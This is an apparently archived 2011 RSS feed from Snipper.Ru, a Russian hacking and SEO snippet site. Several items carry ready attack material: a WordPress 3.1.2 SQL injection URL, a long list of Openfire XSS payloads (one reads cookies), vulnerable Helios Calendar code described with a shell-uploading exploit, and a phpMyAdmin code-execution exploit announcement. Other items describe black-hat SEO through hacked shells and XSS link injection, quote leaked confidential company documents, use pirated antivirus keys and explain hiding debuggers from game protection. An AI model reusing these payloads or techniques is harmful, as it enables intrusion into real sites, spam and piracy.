<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	><channel>
<title>Snipper.Ru</title>
<link>http://snipper.ru</link>
<description>Последние снипы на Snipper.Ru</description>
<language>ru</language>
<pubDate>Wed, 08 Feb 2012 15:45:36 GMT</pubDate>
<item>
<title>(SQL) MSSQLi connect - DarkSim</title>
<link>http://snipper.ru/view/106/mssqli-connect/</link>
<description><![CDATA[ <p></p> ]]></description>
<pubDate>Sat, 03 Sep 2011 11:23:16 GMT</pubDate>
<guid>http://snipper.ru/view/106/mssqli-connect/</guid>
</item>
<item>
<title>(Форумы, Perl) Следилка за обновляемыми торрентами rutracker.org - ilc</title>
<link>http://snipper.ru/view/105/sledilka-za-obnovlyaemymi-torrentami-rutrackerorg/</link>
<description><![CDATA[ <p><h3>Предисловие</h3><br />
Разжижая свой мозг просмотрами анимэ заметил, что я теряю кучу времени за проверкой не вышли ли новые серии в обновляемой раздаче на rutracker.org. Решил развлечься и написать скриптик для своего роутера: чтобы он делал всю работу за меня.<br />
<h2>Постановка задачи</h2><br />
есть файл со списком ссылок на обновляемые раздачи. Будем проверять на трэкере, когда зарегистрирован торрент и проверяем поменялось ли это значение.<br />
Файл изначально может выглядеть как-то так:<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="3">http://rutracker.org/forum/viewtopic.php?t=3642748
http://rutracker.org/forum/viewtopic.php?t=3534175
http://rutracker.org/forum/viewtopic.php?t=3650895</textarea><br />
а после первого прохода<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="3">http://rutracker.org/forum/viewtopic.php?t=3642748|11-Авг-11 13:48
http://rutracker.org/forum/viewtopic.php?t=3534175|09-Авг-11 03:17
http://rutracker.org/forum/viewtopic.php?t=3650895|29-Июл-11 12:14</textarea><br />
Код я снабдил комментариями, должно быть всё понятно.<br />
<br />
зы: я конечно мог запрятать всё в модуль и оставить только настройки. Но тогда как вы сможете всё переиначить и сделать по своему</p> ]]></description>
<pubDate>Fri, 12 Aug 2011 16:10:44 GMT</pubDate>
<guid>http://snipper.ru/view/105/sledilka-za-obnovlyaemymi-torrentami-rutrackerorg/</guid>
</item>
<item>
<title>(Уязвимости, Заметки, PHP) Небезопасный parse_str() в движках - M4g</title>
<link>http://snipper.ru/view/104/nebezopasnyj-parse_str-v-dvizhkax/</link>
<description><![CDATA[ <p>Если вам понравилась <a href="http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/">вот эта вот уязвимость</a> в <strong>phpMyAdmin</strong>, то, думаю, вам небезынтересно будет узнать, что уязвимая конструкция<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="1">parse_str($_SERVER['QUERY_STRING']);</textarea><br />
встречается в PHP движках по крайней мере <strong>50</strong> раз.<br />
Пруф в <a href="http://google.com/codesearch">Google CodeSearch</a>:<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="1">parse_str\(\s?\$_SERVER\['QUERY_STRING'\]\s?\) lang:^php$</textarea></p> ]]></description>
<pubDate>Tue, 12 Jul 2011 03:12:26 GMT</pubDate>
<guid>http://snipper.ru/view/104/nebezopasnyj-parse_str-v-dvizhkax/</guid>
</item>
<item>
<title>(PHP, Эксплойты, Code execution, RFI/LFI, Уязвимости) phpMyAdmin &amp;lt; 3.3.10.2 &amp;amp; &amp;lt; 3.4.3.1 Session Serializer arbitrary PHP code execution exploit - M4g</title>
<link>http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/</link>
<description><![CDATA[ <p>Почитав <a href="https://rdot.org/forum/showthread.php?t=286">вот эту вот тему на РДоте</a>, я решил добить последнюю багу <strong>phpMyAdmin</strong> таким образом, чтобы избавить процесс ее эксплуатации от рудиментов вроде:<br />
<br />
<ol><li>Необходимости авторизации для исполнения кода</li><li>Необходимости наличия отключенной директивы <strong>magic_quotes_gpc</strong></li><li>Необходимости наличия директории <strong>./config</strong></li></ol><br />
<br />
<strong>И это у меня получилось!</strong><br />
<strong>UPD: почти: magic_quotes_gpc все-таки off + PHP &amp;lt;= 5.2.13 &amp;amp; PHP &amp;lt;= 5.3.2</strong><br />
<br />
Для начала немного теории.<br />
<ul><li><a href="http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/">Курим</a> старый эксплойт с исполнением кода в <strong>unserialize</strong></li><li><a href="http://php-security.org/2010/05/31/mops-2010-060-php-session-serializer-session-data-injection-vulnerability/index.html">Курим</a> <em>PHP Session Serializer Session Data Injection Vulnerability</em> от Стефана Эссера</li><li>Понимаем, что в <a href="http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html">последних багах</a> у нас есть полный доступ к сессиям</li><li><s>Вспоминаем, что функция <em><a href="http://ru.php.net/parse_str">parse_str</a></em> проводит свои параметры через <em>urldecode</em></s></li><li>Смотрим на <a href="https://rdot.org/forum/showpost.php?p=13736&amp;amp;postcount=6">модификацию моего эксплойта</a> от asddas, где отпала необходимость использования <strong>ftp</strong></li></ul><br />
<br />
На выходе получаем замечательный эксплойт с выполнением произвольного PHP кода для последних версий <strong>phpMyAdmin</strong>.<br />
<br />
<p><strong>Замечания и пожелания приветствуются.</strong></p></p> ]]></description>
<pubDate>Sun, 10 Jul 2011 18:19:17 GMT</pubDate>
<guid>http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/</guid>
</item>
<item>
<title>(Социальные сети, Заметки) Неправильная разметка страниц ВКонтакте - M4g</title>
<link>http://snipper.ru/view/102/nepravilnaya-razmetka-stranic-vkontakte/</link>
<description><![CDATA[ <p><a href="http://vkontakte.ru/id1">Заходим на страницу Дурова</a> с помощью Оперы, жмем правой кнопкой, далее - &amp;quot;Соблюдены ли вебстандарты&amp;quot; и наблюдаем веселую картинку:<br />
<small>Цитата:</small><br/><textarea id="code" cols="80" rows="1">Errors found while checking this document as XHTML 1.0 Strict!Result:	 481 Errors, 182 warning(s)</textarea><br />
ЛОЛ)</p> ]]></description>
<pubDate>Mon, 20 Jun 2011 15:17:21 GMT</pubDate>
<guid>http://snipper.ru/view/102/nepravilnaya-razmetka-stranic-vkontakte/</guid>
</item>
<item>
<title>(SQL инъекции, Code execution, Движки, Эксплойты, Уязвимости, PHP) Helios Calendar 1.x.x Sql Injection &amp;amp; PHP Code execution exploit - M4g</title>
<link>http://snipper.ru/view/101/helios-calendar-1xx-sql-injection-php-code-execution-exploit/</link>
<description><![CDATA[ <p>Этот скрипт стоит <strong>$149</strong> и практически в каждом <strong>(!)</strong> своем файле содержит скуль-инъекцию.<br />
Один из самых удобных векторов атаки содержится в файле <em>./admin/components/ResetPassword.php</em>:<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="10">...
	$aID = (isset($_POST['aID'])) ? $_POST['aID'] : 0;
	$pass1 = (isset($_POST['pass1'])) ? $_POST['pass1'] : '';
	$pass2 = (isset($_POST['pass2'])) ? $_POST['pass2'] : '';
	
	$result = doQuery(&amp;quot;SELECT * FROM &amp;quot; . HC_TblPrefix . &amp;quot;admin WHERE PkID = &amp;quot; . cIn($aID));
	if(hasRows($result)){
		if($pass1 == $pass2){
			doQuery(&amp;quot;UPDATE &amp;quot; . HC_TblPrefix . &amp;quot;admin SET Passwrd = '&amp;quot; . cIn(md5(md5($pass1) . mysql_result($result,0,3))) . &amp;quot;', PCKey = NULL WHERE PkID = &amp;quot; . cIn($aID));
...</textarea><br />
<br />
Налицо <strong>SQL-инъекция</strong> в переменной <strong>$aID</strong> (в скуль-запросе она не обрамляется кавычками).<br />
Привожу код эксплойта, который очень удобно меняет пароль админа и заливает шелл.</p> ]]></description>
<pubDate>Thu, 09 Jun 2011 01:07:35 GMT</pubDate>
<guid>http://snipper.ru/view/101/helios-calendar-1xx-sql-injection-php-code-execution-exploit/</guid>
</item>
<item>
<title>(Заметки, Раскрытие данных) Утечка внутренних документов компании i-Jet Media - M4g</title>
<link>http://snipper.ru/view/100/utechka-vnutrennix-dokumentov-kompanii-i-jet-media/</link>
<description><![CDATA[ <p>В Сеть утекли некоторые конфиденциальные документы известнейшего российского издателя игр в социальных сетях <strong><a href="http://i-jet.ru">i-Jet Media</a></strong>.<br />
<br />
Выдержка с официального сайта компании<br />
<small>Цитата:</small><br/><textarea id="code" cols="80" rows="4">i-Jet Media сегодня – это:
Более 6 лет напряженной, и вместе с этим захватывающей жизни в динамичном мире онлайн-игр
Более 150 сотрудников
6 офисов: Sunnyvale (Силиконовая долина, Калифорния, США), Пекин (Китай), а также Екатеринбург, Челябинск, Нижний Тагил и Озерск (Россия)</textarea><br />
<br />
<strong><em>Среди утекших документов</em></strong>:<br />
<br />
<ul><li>сводная статистика по всем выпущенным играм (какие игры сколько заработали в определенной социальной сети)</li><li>слайды, описывающие внутренню структуру и схему работы компании - &amp;quot;<strong>Art&amp;amp;Interface Department structure and its technological process</strong>&amp;quot;</li><li>слайды с описанием новой, еще не выпущенной игры, &amp;quot;<strong>TREASURE SVALKA</strong>&amp;quot;</li><li>схема взаимодействия продюсеров I-Jet и удаленных разработчиков</li><li>очень интересный документ под названием &amp;quot;<strong>А чем таким крутым мы занимаемся</strong>&amp;quot;<br />
<br />
<small>Цитата:</small><br/><textarea id="code" cols="80" rows="20">Чтобы понять, что нужно делать, нужно определиться, чем мы вообще занимаемся.
Чем мы занимаемся? Разработкой игр.
Чем занимаются наши пользователи? Играют в эти самые игры.
Если вы так считаете, то проект зафейлен. Он может стать очень крутым по графике или геймплею, он может нахапать достаточно денег на стартовом этапе, но в итоге все скатится к нулю - и это будет очень грустно.
Чем мы занимаемся? ПРОДАЖАМИ. Мы продаем - начиная от художника, заканчивая продюсером.
Что мы продаем? Счастье, веселье, эмоции. Что-то отдаем просто так, на халяву, что-то - за реальные деньги.
Чем занимаются наши пользователи? Покупают.
Таковой должна быть позиция разработчика социгр. Специфика рынка такова, что разработка социгр существенным образом отличается от коробочных игр тем, что в конечном счете весь геймплей должен быть заточен под продажи - просто пути достижения разные.
Взаимоисключающим параграфом данной концепции является следующий факт - по-хорошему мы делаем магазин, но если пользователь догадается, что мы сделали магазин, а не игру - это провал. Пользователю проще сходить в реальный магазин и купить что-то более весомое, нежели набор пикселей. Поэтому к магазину обязательно должно быть добавлено обоснование, коим и является сама игра.
Главное отличие от рынка коробочных игр - в цикле производства и релизов. Обычный издатель делает игру, отдает ее в реализацию - все, его работа завершена. Максимум, что он может сделать - выпустить пару патчей, которые залатают дыры внутри игры. Любой мод, любой пак расширения - это новая игра и новый технологический цикл. Производство-релиз-продажа.
В социграх все одновременно проще и сложнее. Производство-релиз-продажи-апдейт-релиз-продажи - и так до бесконечности (до тотальной нерентабельности проекта, апдейт ради Глафиры Семеновны из села Жужащие Перепелки издателю невыгоден).
Проще - мы можем поправить все те проблемы, которые возникли два апдейта назад. Сложнее - мы можем навернуть самый успешный проект легким взмахом руки. Про взмахи руки - в следующих главах.

Краткие тезисы:
1. Мы не делаем игры.
2. Мы делаем магазин.
3. Мы продаем счастье.
4. Пользователи покупают счастье.
5. Если пользователь догадался, что мы сделали магазин, то проект плохой.
6. Не надо махать руками - это плохо.</textarea></li></ul><br />
Вот так вот. <em>Если пользователь догадался, что мы сделали магазин, то проект плохой.</em></p> ]]></description>
<pubDate>Thu, 09 Jun 2011 00:28:22 GMT</pubDate>
<guid>http://snipper.ru/view/100/utechka-vnutrennix-dokumentov-kompanii-i-jet-media/</guid>
</item>
<item>
<title>(Движки, SQL инъекции) WordPress &amp;lt;=3.1.2 SQL injection in ./wp-admin/edit-tags.php - M4g</title>
<link>http://snipper.ru/view/99/wordpress-312-sql-injection-in-wp-adminedit-tagsphp/</link>
<description><![CDATA[ <p>Вышел <strong>WordPress 3.1.3</strong>.  <br />
В списке изменений я нашел один очень интересный ченджсет:<br />
<a href="http://core.trac.wordpress.org/changeset/18021/branches/3.1">http://core.trac.wordpress.org/changeset/18021/branches/3.1</a><br />
<br />
Не буду приводить подробный анализ, ибо для проведения скули нужны права manage_categories, скажу лишь, что баг работает в версиях <strong>3.1, 3.1.1, 3.1.2</strong> и приведу способ эксплуатации:<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="1">http://lamer/wordpress312/wp-admin/edit-tags.php?taxonomy=post_tag&amp;amp;post_type=post&amp;amp;s=test%27%29+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10+%23</textarea></p> ]]></description>
<pubDate>Mon, 30 May 2011 22:54:42 GMT</pubDate>
<guid>http://snipper.ru/view/99/wordpress-312-sql-injection-in-wp-adminedit-tagsphp/</guid>
</item>
<item>
<title>(Perl) Создание сервера обновлений nod32 - ilc</title>
<link>http://snipper.ru/view/98/sozdanie-servera-obnovlenij-nod32/</link>
<description><![CDATA[ <p>Задача: создать сервер обновлений для nod32 v3,4 (v2).<br />
<br />
Что необходимо:<br />
* веб сервер<br />
* perl интерпретатор в системе<br />
* wget утилита<br />
<br />
логика такая: воспроизводим структуру обновлений как на официальном сервере и немного изменяем файл update.ver<br />
<br />
Обращаю ваше внимание, что для того чтобы выкачивать обновления мы будем использовать пиратские ключи, в данной реализации с сайта http://hhuu.net/<br />
<br />
Код я снабдил комментариями чтобы всё было предельно понятно.</p> ]]></description>
<pubDate>Fri, 11 Mar 2011 22:59:21 GMT</pubDate>
<guid>http://snipper.ru/view/98/sozdanie-servera-obnovlenij-nod32/</guid>
</item>
<item>
<title>(XSS) XSS в OPENFIRE - IBA</title>
<link>http://snipper.ru/view/96/xss-v-openfire/</link>
<description><![CDATA[ <p>материал с http://seclists.org<br />
<br />
для поиска нужных страниц юзайте гугл:<br />
<br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/login.jsp?url=&amp;amp;username=test&amp;quot;;
onfocus=javascript:window.location.assign('http://www.google.com');&amp;quot;&amp;gt;</textarea><br />
<br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/login.jsp?url=hello&amp;quot;;
onfocus=javascript:window.location.assign('http://www.google.com');&amp;quot;&amp;gt;</textarea><br />
<br />
      <br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/security-audit-viewer.jsp?range=15&amp;amp;username=&amp;quot;;&amp;gt;&amp;lt;scr
ipt&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;search=Search</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/user-create.jsp?username=test&amp;quot;;&amp;gt;&amp;lt;script&amp;gt;alert('xss'
)&amp;lt;/script&amp;gt;</textarea><br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/user-create.jsp?name=test&amp;quot;;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/s
cript&amp;gt;</textarea><br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/user-create.jsp?email=test&amp;quot;;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/
script&amp;gt;</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/plugins/search/advance-user-search.jsp?criteria=te
st&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/user-roster-add.jsp?username=test&amp;lt;script&amp;gt;alert('xs
s')&amp;lt;/script&amp;gt;</textarea><br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="3">http://localhost:9090/user-roster-add.jsp?username=user&amp;amp;jid=1&amp;amp;nickname=&amp;lt;
script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;email=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;add=Add
+Item</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="4">http://localhost:9090/user-roster.jsp?username=test&amp;lt;script&amp;gt;alert(documen
t.cookie)&amp;lt;/script&amp;gt;
http://localhost:9090/user-lockout.jsp?username=test&amp;lt;script&amp;gt;alert('xss')
&amp;lt;/script&amp;gt;</textarea><br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/group-create.jsp?name=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/sc
ript&amp;gt;&amp;amp;description=&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;create=Create+Group</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/group-edit.jsp?creategroupsuccess=true&amp;amp;group=test&amp;lt;
script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/group-delete.jsp?group=&amp;lt;script&amp;gt;alert('xss')&amp;lt;/scrip
t&amp;gt;</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="13">http://localhost:9090/muc-room-edit-form.jsp?save=true&amp;amp;create=&amp;quot;;&amp;gt;&amp;lt;script&amp;gt;
alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_persistentroom=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/
script&amp;gt;&amp;amp;roomName=23&amp;amp;mucName=conference&amp;amp;roomconfig_roomname=&amp;lt;script&amp;gt;alert
('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomdesc=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;room_
topic=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_maxusers=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(
'XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_presencebroadcast=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/scrip
t&amp;gt;true&amp;amp;roomconfig_presencebroadcast2=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roo
mconfig_presencebroadcast3=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfi
g_roomsecret=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomsecret2=&amp;quot;&amp;gt;&amp;lt;s
cript&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_whois=moderator&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('X
SS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_publicroom=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;
roomconfig_canchangenick=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_
registration=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;Submit=Save+Changes</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/muc-room-delete.jsp?roomJID=&amp;quot;;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')
&amp;lt;/script&amp;gt;&amp;amp;create=false</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="4">http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?urlName=
&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;url=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;user
s=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;groups=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;
&amp;amp;rss=off&amp;amp;createURLBookmark=Create&amp;amp;type=url</textarea><br />
<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="2">http://localhost:9090/plugins/clientcontrol/spark-form.jsp?optionalMessa
ge=&amp;lt;/textarea&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;submit=Update+Spark+Versions</textarea></p> ]]></description>
<pubDate>Thu, 06 Jan 2011 17:12:29 GMT</pubDate>
<guid>http://snipper.ru/view/96/xss-v-openfire/</guid>
</item>
<item>
<title>(Black SEO) Ссылки, получаемые черными способами - Flashback</title>
<link>http://snipper.ru/view/95/ssylki-poluchaemye-chernymi-sposobami/</link>
<description><![CDATA[ <p>Такие ссылки могут быть результатами 2 видов действий: хак или спам. Что я могу выделить из хака:<br />
1) шеллы (очень эффективно, редактируется, например, index.php и в него суется не видная, но очень даже хорошо индексируемая ПСами ссылка)<br />
2) XSS (считается, что уже вообще не учитывается Яндексом, так как там уже запалили эту тему, тут формируется ссылка такого вида http://site.ru/...&amp;lt;a href=”ссылка на наш сайт”&amp;gt;текст&amp;lt;/a&amp;gt;, а потом добавляется через адурилку Яндекса (<a href="http://webmaster.yandex.ru/addurl.xml">http://webmaster.yandex.ru/addurl.xml</a>))<br />
Спам:<br />
1) через хрумер и другие паблик аналоги (форумы, гесты, прочее)<br />
2) через приватные программы/скрипты по еще незаспамленным движкам (более результативно из-за низкой заспамленности)<br />
3) ручной спам по, например, блогам, для автоматизации этого процесса есть специальные программы для поиска блогов по нужным тематикам (тут, конечно, плюс к живучести ссылок)<br />
и многие другие возможные способы спама, которые только могут придти в пытливые головы спамерам.<br />
Все эти черные методы привлекательны тем, что хорошего результата можно добиться быстро и бесплатно (не всегда, но все равно дешевле покупки ссылок), но потом за них можно будет поплатиться.</p> ]]></description>
<pubDate>Thu, 30 Dec 2010 22:35:05 GMT</pubDate>
<guid>http://snipper.ru/view/95/ssylki-poluchaemye-chernymi-sposobami/</guid>
</item>
<item>
<title>(Black SEO) Прогон по каталогам - Flashback</title>
<link>http://snipper.ru/view/94/progon-po-katalogam/</link>
<description><![CDATA[ <p>Надеюсь, что этот снип поможет хоть кому-нибудь. Что нам обычно обещают в темах о прогонах по каталогам? Нам обещают, что сайт сайт будет прогнан по n тысяч каталогов. Писем обычно приходит раз в 10 меньше на почту. Если же посмотреть на резаультат работы, то можно понять, что это уже какого-то рода спам. Среди каталогов можно найти донельзя узкотематические, в которых нашим ссылкам совсем не место. Также могут попасться доски объявлений, гостевые книги и прочее. Почему же от них мало толка?<br />
1) они ужасно заспамлены и ссылки с них можно сказать почти и не передают веса<br />
2) в большинстве ссылки обромлены в nofollow, noindex<br />
3) заявленное количество каталогов и успешно добавленные в них наши ссылки могут отличаться в разы<br />
4) ссылки не являются тематическими<br />
5) нулевые показатели тИЦ и PR у каталогов<br />
и т.п. Поэтому не верьте огромным числам отзывов, полученным до получения реальных результатов от заказавших, которым прогонщики обещают какие-то бонусы взамен на отзыв. Но если вам некуда девать деньги, то почему бы и не заказать прогон?<br /><br />
А теперь сухие цифры. Мне несколько месяцев назад прогоняли далеко не даром сайт по якобы <strong>15к белых каталогов</strong>, сейчас в Яндекс.Вебмастере 1<strong>8 низкокачественных ссылок</strong>!</p> ]]></description>
<pubDate>Thu, 30 Dec 2010 22:02:05 GMT</pubDate>
<guid>http://snipper.ru/view/94/progon-po-katalogam/</guid>
</item>
<item>
<title>(White SEO) Вечные или временные ссылки? - Flashback</title>
<link>http://snipper.ru/view/93/vechnye-ili-vremennye-ssylki/</link>
<description><![CDATA[ <p>Те, кто решили купить ссылки для своего сайта, скорее всего, сталкивались с выбором покупать вечные  или временные ссылки.<br />
Благодаря недавнему появлению новой биржы ссылок <a href="http://kazapa.ru/reg/3410">Kazapa</a>, вечные ссылки тоже можно поделить на быстрые (более дешевые и менее качественные, но быстрые, что тоже есть плюс) и обычные. Также вечные ссылки могут быть и в статьях.<br />
Ссылки в свою силу вступают очень даже не сразу, тем более для Яндекса, да и нужны они нам постоянно, а не на определенное время (исключение – продвижение чужого сайта, поэтому люди, оказывающие эти услуги, так любят <a href="http://www.sape.ru/r.rPsTxlHMBv.php">сапу</a>).<br />
Также большинство сапосайтов сделаны для наживы, и они могут прожить не очень долго, а их тИЦ поднят через ту же <a href="http://www.sape.ru/r.rPsTxlHMBv.php">сапу</a>. Ну а у хороших сайтов и цены повыше.<br />
В той же <a href="http://kazapa.ru/reg/3410">казапе</a> или <a href="http://gogetlinks.net/?inv=9ghjad">ГГЛ</a>, если владелец сайта снимет ссылку в течение какого-то времени, то деньги нам будут возвращены. Если же какой-то сапосайт загнется в итоге или будет забанен Ядексом, то деньги нам никто не вернет, затраченные за все время существования ссылки.<br />
Думаю, ясно к чему я клоню. Хотя для больших объемов вечных ссылок придется затратить колоссальные средства коих у начинающих оптимизаторов нету.</p> ]]></description>
<pubDate>Thu, 30 Dec 2010 16:36:47 GMT</pubDate>
<guid>http://snipper.ru/view/93/vechnye-ili-vremennye-ssylki/</guid>
</item>
<item>
<title>(White SEO) Получаем уникальный контент для сайта - Flashback</title>
<link>http://snipper.ru/view/92/poluchaem-unikalnyj-kontent-dlya-sajta/</link>
<description><![CDATA[ <p>Некоторое время назад я продавал небольшое количество вечных ссылок со своего сайта через <a href="http://gogetlinks.net/?inv=9ghjad">GGL</a>. И у меня был выбор: либо сувать эти ссылки в основной контент сайта (что я не хотел делать), либо созадвать уникальный контент, обособленный немного от тематики моего сайта. Так я и поступил. И передо мной стоял новый выбор: либо покупать этот контент, либо делать самому. Копипастить я не собирался, ибо это бы не оценили ПС и люди, покупающие эти вечные ссылки, тем более страницы с этими ссылками должны были обязательно попасть в индекс яндекса, поэтому я никак не мог позволить себе копипасту.<br />
Как я добывал контент, точнее создавал:<br />
1) искал через <a href="http://news.google.ru/nwshp?hl=ru&amp;amp;tab=wn">http://news.google.ru/nwshp?hl=ru&amp;amp;tab=wn</a> новости нужной мне тематики, а затем рерайтил их. Я считаю, что новость гораздо легче переписать своими словами, чем статью, ибо в новостях нету сложных терминов, а различные временные и прочие обороты можно очень легко перефразировать, что нам на руку. Плюс новостей очень много и легко выбрать из них ту, что будет полегче переписать.<br />
2) искал через <a href="http://www.google.ru/language_tools?hl=ru">http://www.google.ru/language_tools?hl=ru</a> статьи на одних языках и получал сразу нужное в переведенном виде. Тут загвоздка в том, что большинство статей на украинском и других близких к русскому языку уже переведены на русский и они уже не являются уникальными. Поэтому я, например, нашел одну статейку нужной мне тематики на Сербском  и перевел на русский, но в результате машинного перевода смысловая целостность частично нарушилась и мне пришлось ее переделывать немного.<br />
Есть и другие способы, но я ими не пользовался. Например, поиск закрытых уже сайтов через <a href="http://web.archive.org">web.archive.org</a> и выдирание оттуда уникальных статей.</p> ]]></description>
<pubDate>Wed, 29 Dec 2010 16:30:24 GMT</pubDate>
<guid>http://snipper.ru/view/92/poluchaem-unikalnyj-kontent-dlya-sajta/</guid>
</item>
<item>
<title>(White SEO) Получаем бесплатные бэклинки - Flashback</title>
<link>http://snipper.ru/view/91/poluchaem-besplatnye-beklinki/</link>
<description><![CDATA[ <p>Не секрет, что ссылочная масса не плохо котируется в СЕО, благодаря ей наш сайт поднимается по НЧ и СЧ запросам в ПС, я сам не раз в этом убеждался. Конечно, можно покупать ссылки или ждать пока на нас сошлется тот или иной авторитетный сайт с высокими показателями PR и тИЦ, а можно нахаляву получить немного бэков, не очень хорошего качества и с не очень большой передачей веса, но все же.<br />
Одним из главных источников я могу назвать форумы. Некоторые даже специально регаются на куче форумов, указывают в профиле ссылки и некоторые из них даже вылезают в яндекс.вебмастере:<br />
<img src="http://snipper.ru/uploads/attachments/91/1.png" alt="Яндекс.Вебмастер" /><br />
на тИЦ они почти не влияют, но все же лучше, чем ничего.<br />
Также просто получить бэки с так называемых dofollow блогов, это те блоги, у которых ссылки комментаторов не обрамляются в nofollow (что стоит по дефолту в WP). Вот пример:<br />
<img src="http://snipper.ru/uploads/attachments/91/2.png" alt="Яндекс.Вебмастер" /><br />
таких блогов не мало, можно найти их списки в интернете и очень даже немаленькие.<br />
Ну и остались только сайты, чей контент могут наполнять люди сами в виде своих блогов на таких сайтах или еще что-нибудь, например тот же privet.ru:<br />
<img src="http://snipper.ru/uploads/attachments/91/3.png" alt="Яндекс.Вебмастер" /><br />
Что же можно сказать в заключение. Наверное, то, что таким халявным способом невозможно получить хорошие ссылки с большим трастом.</p> ]]></description>
<pubDate>Wed, 29 Dec 2010 16:13:01 GMT</pubDate>
<guid>http://snipper.ru/view/91/poluchaem-besplatnye-beklinki/</guid>
</item>
<item>
<title>(Заметки, Реверсинг, Геймхак) Скрываем инструменты - Flashback</title>
<link>http://snipper.ru/view/87/skryvaem-instrumenty/</link>
<description><![CDATA[ <p>Некоторые программы и игры для своей самозащиты от взлома могут находить запущенные инструменты для взлома и или закрываться, или закрывать наши инструменты. Вот реально работающие методы, которые я сам использовал:<br />
1) плагины/патчи (для SoftICE – IceExt, FrogICE; для OllyDBG – Phant0m plugin, StrongOD)<br />
2) переименовывание файлов (например, исполняемых или используемых ими драйверов и библеотек, но тогда нужно будет патчить и сам исполняемый файл, что опять попадает под п1)<br />
